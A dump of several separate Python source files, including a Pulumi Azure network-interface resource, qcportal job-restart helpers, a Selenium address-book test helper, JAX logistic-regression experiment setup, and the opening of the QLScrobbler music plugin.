__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["applied_dns_servers"] = None
__props__.__dict__["internal_domain_name_suffix"] = None
__props__.__dict__["mac_address"] = None
__props__.__dict__["private_ip_address"] = None
__props__.__dict__["private_ip_addresses"] = None
__props__.__dict__["virtual_machine_id"] = None
super(NetworkInterface, __self__).__init__(
'azure:network/networkInterface:NetworkInterface',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
applied_dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
internal_domain_name_suffix: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
private_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machine_id: Optional[pulumi.Input[str]] = None) -> 'NetworkInterface':
"""
Get an existing NetworkInterface resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] applied_dns_servers: If the Virtual Machine using this Network Interface is part of an Availability Set, then this list will have the union of all DNS servers from all Network Interfaces that are part of the Availability Set.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
:param pulumi.Input[bool] enable_accelerated_networking: Should Accelerated Networking be enabled? Defaults to `false`.
:param pulumi.Input[bool] enable_ip_forwarding: Should IP Forwarding be enabled? Defaults to `false`.
:param pulumi.Input[str] internal_dns_name_label: The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
:param pulumi.Input[str] internal_domain_name_suffix: Even if `internal_dns_name_label` is not specified, a DNS entry is created for the primary NIC of the VM. This DNS name can be constructed by concatenating the VM name with the value of `internal_domain_name_suffix`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]] ip_configurations: One or more `ip_configuration` blocks as defined below.
:param pulumi.Input[str] location: The location where the Network Interface should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] mac_address: The Media Access Control (MAC) Address of the Network Interface.
:param pulumi.Input[str] name: The name of the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[str] private_ip_address: The Static IP Address which should be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_ip_addresses: The private IP addresses of the network interface.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine which this Network Interface is connected to.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NetworkInterfaceState.__new__(_NetworkInterfaceState)
__props__.__dict__["applied_dns_servers"] = applied_dns_servers
__props__.__dict__["dns_servers"] = dns_servers
__props__.__dict__["enable_accelerated_networking"] = enable_accelerated_networking
__props__.__dict__["enable_ip_forwarding"] = enable_ip_forwarding
__props__.__dict__["internal_dns_name_label"] = internal_dns_name_label
__props__.__dict__["internal_domain_name_suffix"] = internal_domain_name_suffix
__props__.__dict__["ip_configurations"] = ip_configurations
__props__.__dict__["location"] = location
__props__.__dict__["mac_address"] = mac_address
__props__.__dict__["name"] = name
__props__.__dict__["private_ip_address"] = private_ip_address
__props__.__dict__["private_ip_addresses"] = private_ip_addresses
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["virtual_machine_id"] = virtual_machine_id
return NetworkInterface(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="appliedDnsServers")
def applied_dns_servers(self) -> pulumi.Output[Sequence[str]]:
"""
If the Virtual Machine using this Network Interface is part of an Availability Set, then this list will have the union of all DNS servers from all Network Interfaces that are part of the Availability Set.
"""
return pulumi.get(self, "applied_dns_servers")
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> pulumi.Output[Sequence[str]]:
"""
A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
"""
return pulumi.get(self, "dns_servers")
@property
@pulumi.getter(name="enableAcceleratedNetworking")
def enable_accelerated_networking(self) -> pulumi.Output[Optional[bool]]:
"""
Should Accelerated Networking be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_accelerated_networking")
@property
@pulumi.getter(name="enableIpForwarding")
def enable_ip_forwarding(self) -> pulumi.Output[Optional[bool]]:
"""
Should IP Forwarding be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_ip_forwarding")
@property
@pulumi.getter(name="internalDnsNameLabel")
def internal_dns_name_label(self) -> pulumi.Output[str]:
"""
The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
"""
return pulumi.get(self, "internal_dns_name_label")
@property
@pulumi.getter(name="internalDomainNameSuffix")
def internal_domain_name_suffix(self) -> pulumi.Output[str]:
"""
Even if `internal_dns_name_label` is not specified, a DNS entry is created for the primary NIC of the VM. This DNS name can be constructed by concatenating the VM name with the value of `internal_domain_name_suffix`.
"""
return pulumi.get(self, "internal_domain_name_suffix")
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> pulumi.Output[Sequence['outputs.NetworkInterfaceIpConfiguration']]:
"""
One or more `ip_configuration` blocks as defined below.
"""
return pulumi.get(self, "ip_configurations")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The location where the Network Interface should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> pulumi.Output[str]:
"""
The Media Access Control (MAC) Address of the Network Interface.
"""
return pulumi.get(self, "mac_address")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> pulumi.Output[str]:
"""
The Static IP Address which should be used.
"""
return pulumi.get(self, "private_ip_address")
@property
@pulumi.getter(name="privateIpAddresses")
def private_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
"""
The private IP addresses of the network interface.
"""
return pulumi.get(self, "private_ip_addresses")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="virtualMachineId")
def virtual_machine_id(self) -> pulumi.Output[str]:
"""
The ID of the Virtual Machine which this Network Interface is connected to.
"""
return pulumi.get(self, "virtual_machine_id")
|
from collections import defaultdict, Counter
import qcportal as ptl
## failures and incompletes
def get_optimizations(dataset, spec, client, dropna=False):
ds = dataset
while True:
try:
ds.status(spec)
except:
pass
else:
break
if dropna:
df = ds.df.dropna()
else:
df = ds.df
ids = list(set(i.id for i in df[spec]))
res = _query_procedures(ids, client)
return res
def get_unfinished_optimizations(dataset, spec, client, dropna=False):
res = get_optimizations(dataset, spec, client, dropna=dropna)
res = [opt for opt in res if opt.status != 'COMPLETE']
return res
def _query_procedures(ids, client):
res = []
ids = list(ids)
for i in range(0,len(ids),1000):
ids_i = ids[i:i+1000]
res_i = client.query_procedures(ids_i)
res.extend(res_i)
return res
def get_torsiondrives(
dataset, spec, client, noncomplete=False):
ds = dataset
while True:
try:
ds.status(spec)
except:
pass
else:
break
return ds.df[spec].tolist()
def get_torsiondrive_optimizations(
dataset, spec, client, noncomplete=False):
ds = dataset
while True:
try:
ds.status(spec)
except:
pass
else:
break
optimizations = defaultdict(set)
for tdr in ds.df[spec]:
for val in tdr.optimization_history.values():
optimizations[tdr.id].update(set(val))
res_opt = {key: _query_procedures(value, client) for key, value in optimizations.items()}
if noncomplete:
res_opt = {key: [opt for opt in value if opt.status != 'COMPLETE']
for key, value in res_opt.items()}
return res_opt
def get_unfinished_torsiondrive_optimizations(
dataset, spec, client, noncomplete=False):
res_opt = get_torsiondrive_optimizations(dataset, spec, client, noncomplete=noncomplete)
ds = dataset
for tdr in ds.df[spec]:
if tdr.status == 'COMPLETE':
res_opt.pop(tdr.id, None)
return res_opt
def merge(datadict):
res_s = set()
res = list()
for val in datadict.values():
new_ids = set(i.id for i in val) - res_s
res.extend([i for i in val if i.id in new_ids])
return res
## error messages
def get_unique_optimization_error_messages(optimizations, full=False):
if full:
return set(opt.get_error().error_message
for opt in optimizations if opt.status == 'ERROR')
else:
return set(opt.get_error().error_message.split('\n')[-2]
for opt in optimizations if opt.status == 'ERROR')
def count_unique_optimization_error_messages(
optimizations, full=False, pretty_print=False, tolerate_missing=False):
errors = Counter()
for opt in optimizations:
if opt.status != 'ERROR':
continue
err_content = opt.get_error()
if tolerate_missing:
if err_content is None:
errors += Counter({None: 1})
continue
if full:
errors += Counter({err_content.error_message: 1})
else:
errors += Counter({err_content.error_message.split('\n')[-2]: 1})
errors = dict(errors)
content = ""
if pretty_print:
for key, value in errors.items():
content += f"There are {value} instances of\n"
content += '-------------------------------------\n'
content += f'{key}\n'
content += '-------------------------------------\n'
return content
else:
return errors
## restarts
def restart_optimizations(optimizations, client):
for opt in optimizations:
if opt.status == 'ERROR':
print(opt)
client.modify_tasks(operation='restart', base_result=opt.id)
def restart_torsiondrives(torsiondrives, client):
for tdr in torsiondrives:
if tdr.status == 'ERROR':
print(tdr)
client.modify_services('restart', procedure_id=tdr.id)
|
from model.contact import Contact
import re
class ContactHelper:
def __init__(self, app):
self.app = app
def open_contacts_page(self):
# open groups page
wd = self.app.wd
wd.find_element_by_link_text("home").click()
def create_contact(self, Contact):
wd = self.app.wd
self.open_contacts_page()
# init contact creation
wd.find_element_by_link_text("add new").click()
# fill contact info
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(Contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(Contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(Contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(Contact.nickname)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(Contact.title)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(Contact.company)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(Contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(Contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(Contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(Contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(Contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(Contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(Contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(Contact.homepage)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[3]").click()
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[3]").click()
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(Contact.ayear)
wd.find_element_by_name("theform").click()
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(Contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(Contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(Contact.notes)
# submit contact creation
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
self.contact_cache = None
def delete_first_contact(self):
self.delete_contact_by_index(0)
def delete_contact_by_index(self,index):
wd = self.app.wd
self.open_contacts_page()
wd.find_elements_by_name("selected[]")[index].click()
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cache = None
def delete_contact_by_id(self,id):
wd = self.app.wd
self.open_contacts_page()
wd.find_element_by_css_selector("input[value=\"%s\"]" % id).click()
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cache = None
def mod_first_contact(self, Contact):
self.mod_contact_by_index(0, Contact)
def mod_contact_by_index(self, index, Contact):
wd = self.app.wd
self.open_contacts_page()
wd.find_elements_by_name("selected[]")[index].click()
#wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[2]/td[8]/a/img").click()
wd.find_elements_by_xpath("//img[@title='Edit']")[index].click()
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(Contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(Contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(Contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(Contact.nickname)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(Contact.company)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(Contact.title)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(Contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(Contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(Contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(Contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(Contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(Contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(Contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(Contact.homepage)
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(Contact.ayear)
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(Contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(Contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(Contact.notes)
wd.find_element_by_xpath("//div[@id='content']/form[1]/input[22]").click()
self.contact_cache = None
def mod_contact_by_id(self, id, Contact):
wd = self.app.wd
self.open_contacts_page()
checkbox=wd.find_element_by_css_selector("input[value=\"%s\"]" % id)
#checkbox = self.select_contact_by_id()
# Find row of this checkbox
row = checkbox.find_element_by_xpath("./../..")
# Click on "Edit" picture
row.find_elements_by_css_selector("td")[7].click()
#wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[2]/td[8]/a/img").click()
#wd.find_elements_by_xpath("//img[@title='Edit']")[index].click()
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(Contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(Contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(Contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(Contact.nickname)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(Contact.company)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(Contact.title)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(Contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(Contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(Contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(Contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(Contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(Contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(Contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(Contact.homepage)
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(Contact.ayear)
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(Contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(Contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(Contact.notes)
wd.find_element_by_xpath("//div[@id='content']/form[1]/input[22]").click()
self.contact_cache = None
def count_contact(self):
wd = self.app.wd
self.open_contacts_page()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.open_contacts_page()
self.contact_cache=[]
for element in wd.find_elements_by_name("entry"):
strs = element.find_elements_by_tag_name("td")
name1 = strs[2].text
name2 = strs[1].text
id=element.find_element_by_name("selected[]").get_attribute("value")
all_phones=strs[5].text
all_emails=strs[4].text
self.contact_cache.append(Contact(firstname=name1, lastname=name2, id=id,
all_phones_from_home_page=all_phones, all_emails_from_home_page=all_emails))
return list(self.contact_cache)
def open_contact_to_edit_by_index(self,index):
wd = self.app.wd
self.open_contacts_page()
row=wd.find_elements_by_name("entry")[index]
cell=row.find_elements_by_tag_name("td")[7]
cell.find_element_by_tag_name("a").click()
def open_contact_view_by_index(self,index):
wd = self.app.wd
self.open_contacts_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[6]
cell.find_element_by_tag_name("a").click()
def get_contact_info_from_edit_page(self,index):
wd = self.app.wd
self.open_contact_to_edit_by_index(index)
firstname= wd.find_element_by_name("firstname").get_attribute("value")
lastname= wd.find_element_by_name("lastname").get_attribute("value")
#middlename = wd.find_element_by_name("middlename").get_attribute("value")
#title = wd.find_element_by_name("title").get_attribute("value")
#nickname = wd.find_element_by_name("nickname").get_attribute("value")
#company= wd.find_element_by_name("company").get_attribute("value")
#address = wd.find_element_by_name("address").get_attribute("value")
id= wd.find_element_by_name("id").get_attribute("value")
homephone= wd.find_element_by_name("home").get_attribute("value")
workphone= wd.find_element_by_name("work").get_attribute("value")
mobilephone= wd.find_element_by_name("mobile").get_attribute("value")
secondaryphone= wd.find_element_by_name("phone2").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
email3 = wd.find_element_by_name("email3").get_attribute("value")
#ayear= wd.find_element_by_name("ayear").get_attribute("value")
#byear= wd.find_element_by_name("byear").get_attribute("value")
#homepage= wd.find_element_by_name("homepage").get_attribute("value")
#address2= wd.find_element_by_name("address2").get_attribute("value")
#phone2= wd.find_element_by_name("phone2").get_attribute("value")
#notes= wd.find_element_by_name("notes").get_attribute("value")
return Contact(firstname=firstname,lastname=lastname,id=id,home=homephone,work=workphone,
mobile=mobilephone,phone2=secondaryphone, email=email,email2=email2, email3=email3)
def get_contact_from_view_page(self,index):
wd = self.app.wd
self.open_contact_view_by_index(index)
text=wd.find_element_by_id("content").text
homephone = re.search("H: (.*)", text).group(1)
workphone = re.search("W: (.*)", text).group(1)
mobilephone = re.search("M: (.*)", text).group(1)
secondaryphone = re.search("P: (.*)", text).group(1)
return Contact(home=homephone, work=workphone, mobile=mobilephone, phone2=secondaryphone)
|
from multi_logreg import register_pytree_node_dataclass
import datasets
import numpy as np
import jax.numpy as jnp
import jax
from preprocess_logreg import PreProcessLogReg
from argparse import Namespace
from os import path
from typing import Dict, Any
from zipfile import ZipFile
from typing import Tuple
from dataclasses import dataclass
Dataset = Tuple[jnp.ndarray, jnp.ndarray]
@jax.jit
def normalize(inputs: jnp.ndarray) -> jnp.ndarray:
"""Normalizes feature vectors so that they have unit L2-norm"""
return inputs / jnp.linalg.norm(inputs, ord=2, axis=1, keepdims=True)
@register_pytree_node_dataclass
@dataclass(eq=True, frozen=True)
class MyLogReg(PreProcessLogReg):
"""Multi-class logistic regression, with L2 normalization applied to each input"""
def preprocess(self, inputs: jnp.ndarray) -> jnp.ndarray:
return normalize(inputs)
def mnist_binary(args: Namespace) -> Tuple[Namespace, Dataset, Dataset, MyLogReg]:
"""Initialize an experiment using Binary-MNIST (8 vs 3)"""
X, y, X_test, y_test = datasets.mnist_binary(8, neg_class=3, dtype=np.float64)
train = X, y
test = X_test, y_test
model = MyLogReg(lamb=args.lamb, epsilon=args.epsilon, delta=args.delta, sigma=args.sigma,
classes=np.array([0.0, 1.0]))
args.feature_min = 0.0 if args.feature_min is None else args.feature_min
args.feature_max = 1.0 if args.feature_max is None else args.feature_max
return args, train, test, model
def mnist(args: Namespace) -> Tuple[Namespace, Dataset, Dataset, MyLogReg]:
"""Initialize an experiment using MNIST"""
X, y, X_test, y_test = datasets.mnist(dtype=np.float64)
train = X, y
test = X_test, y_test
model = MyLogReg(lamb=args.lamb, epsilon=args.epsilon, delta=args.delta, sigma=args.sigma,
classes=np.arange(10.0))
args.feature_min = 0.0 if args.feature_min is None else args.feature_min
args.feature_max = 1.0 if args.feature_max is None else args.feature_max
return args, train, test, model
def fashion_mnist(args: Namespace) -> Tuple[Namespace, Dataset, Dataset, MyLogReg]:
"""Initialize an experiment using Fashion-MNIST"""
X, y, X_test, y_test = datasets.fashion_mnist(dtype=np.float64)
train = X, y
test = X_test, y_test
model = MyLogReg(lamb=args.lamb, epsilon=args.epsilon, delta=args.delta, sigma=args.sigma,
classes=np.arange(10.0))
args.feature_min = 0.0 if args.feature_min is None else args.feature_min
args.feature_max = 1.0 if args.feature_max is None else args.feature_max
return args, train, test, model
def har(args: Dict[str, Any]) -> Tuple[Dict[str, Any], Dataset, Dataset, MyLogReg]:
"""Initialize an experiment using HAR"""
url = "https://archive.ics.uci.edu/ml/machine-learning-databases/00240/UCI%20HAR%20Dataset.zip"
filename = "UCI_HAR_Dataset.zip"
datasets._download(url, filename)
arrays = {'X': 'UCI HAR Dataset/train/X_train.txt',
'y': 'UCI HAR Dataset/train/y_train.txt',
'X_test': 'UCI HAR Dataset/test/X_test.txt',
'y_test': 'UCI HAR Dataset/test/y_test.txt'}
with ZipFile(path.join(datasets._DATA, filename)) as z:
for a, p in arrays.items():
with z.open(p) as f:
arrays[a] = np.loadtxt(f)
train = arrays['X'], arrays['y']
test = arrays['X_test'], arrays['y_test']
model = MyLogReg(lamb=args.lamb, epsilon=args.epsilon, delta=args.delta, sigma=args.sigma,
classes=np.arange(1.0, 7.0))
args.feature_min = -1.0 if args.feature_min is None else args.feature_min
args.feature_max = 1.0 if args.feature_max is None else args.feature_max
return args, train, test, model
|
# QLScrobbler: an Audioscrobbler client plugin for Quod Libet.
# version 0.11
# (C) 2005-2012 by <NAME> <<EMAIL>>,
# <NAME> <<EMAIL>>,
# <NAME> <<EMAIL>>,
# <NAME> <<EMAIL>>,
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# Licensed under GPLv2. See Quod Libet's COPYING for more information.
from httplib import HTTPException
import cPickle as pickle
import os
import threading
import time
import urllib
import urllib2
from gi.repository import Gtk, GLib
try:
from hashlib import md5
except ImportError:
from md5 import md5
import quodlibet
from quodlibet import config, const, app, parse, util, qltk
from quodlibet.plugins.events import EventPlugin
from quodlibet.plugins import PluginConfigMixin
from quodlibet.qltk.entry import ValidatingEntry, UndoEntry
from quodlibet.qltk.msg import Message
from quodlibet.util.dprint import print_d
SERVICES = {
'Last.fm': 'http://post.audioscrobbler.com/',
'Libre.fm': 'http://turtle.libre.fm/'
}
DEFAULT_SERVICE = 'Last.fm'
DEFAULT_TITLEPAT = '<title><version| (<version>)>'
DEFAULT_ARTISTPAT = '<artist|<artist>|<composer|<composer>|<performer>>>'
def config_get(key, default=''):
"""Returns value for 'key' from config. If key is missing *or empty*,
return default."""
try:
return (config.get("plugins", "scrobbler_%s" % key) or default)
except config.Error:
return default
class QLSubmitQueue(PluginConfigMixin):
"""Manages the submit queue for scrobbles. Works independently of the
QLScrobbler plugin being enabled; other plugins may use submit() to queue
songs for scrobbling.
"""
CLIENT = "qlb"
PROTOCOL_VERSION = "1.2"
DUMP = os.path.join(const.USERDIR, "scrobbler_cache")
# This must be the kept the same as `QLScrobbler`
CONFIG_SECTION = "scrobbler"
# These objects are shared across instances, to allow other plugins to
# queue scrobbles in future versions of QL
queue = []
changed_event = threading.Event()
def config_get_url(self):
"""Gets the URL for the currently configured service.
This logic was used often enough to be split out from generic config"""
# TODO: share this between the classes better
service = self.config_get('service', DEFAULT_SERVICE)
if service in SERVICES:
return SERVICES[service]
else:
return self.config_get('url')
def set_nowplaying(self, song):
"""Send a Now Playing notification."""
formatted = self._format_song(song)
if not formatted or self.nowplaying_song == formatted:
return
self.nowplaying_song = formatted
self.nowplaying_sent = False
self.changed()
def submit(self, song, timestamp=0):
"""Submit a song. If 'timestamp' is 0, the current time will
be used."""
formatted = self._format_song(song)
if formatted is None:
return
if timestamp > 0:
formatted['i'] = str(timestamp)
elif timestamp == 0:
formatted['i'] = str(int(time.time()))
else:
# TODO: Forging timestamps for submission from PMPs
return
self.queue.append(formatted)
self.changed()
def _format_song(self, song):
"""Returns a dict with the keys formatted as required by spec."""
store = {
"l": str(song.get("~#length", 0)),
"n": str(song("~#track")),
"b": song.comma("album"),
"m": song("musicbrainz_trackid"),
"t": self.titlepat.format(song),
"a": self.artpat.format(song),
}
# Spec requires title and artist at minimum
if not (store.get("a") and store.get("t")):
return None
